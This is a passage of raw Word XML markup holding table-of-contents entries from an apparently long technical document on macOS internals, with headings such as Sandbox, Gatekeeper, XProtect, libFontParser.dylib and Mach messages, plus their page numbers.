              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SIP</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313329 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sandbox</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313330 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>162</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Code sign</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313331 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>162</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32" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>application loader</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313332 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>162</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33" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.5.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kernel extension loader</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313333 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XProtect</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313334 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>164</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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gatekeeper</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313335 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16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36" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.7.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Quarantine Flag</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313336 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>164</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37" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Font</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>165</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8" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ATS (Apple Type Service)</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313338 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>165</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39" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>libFontParser.dylib</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</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40" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313340 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313341" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kernel Programming Guid</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313341 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313342" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apple Sandbox</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313342 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313343" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mac memory analysis with volatility</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313343 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</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44" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MIG--Mach msg</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313344 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>183</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45" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.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45 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>183</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46" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(user) Mach_msg</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313346 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18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47" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ipc_kmsg_t</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313347 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
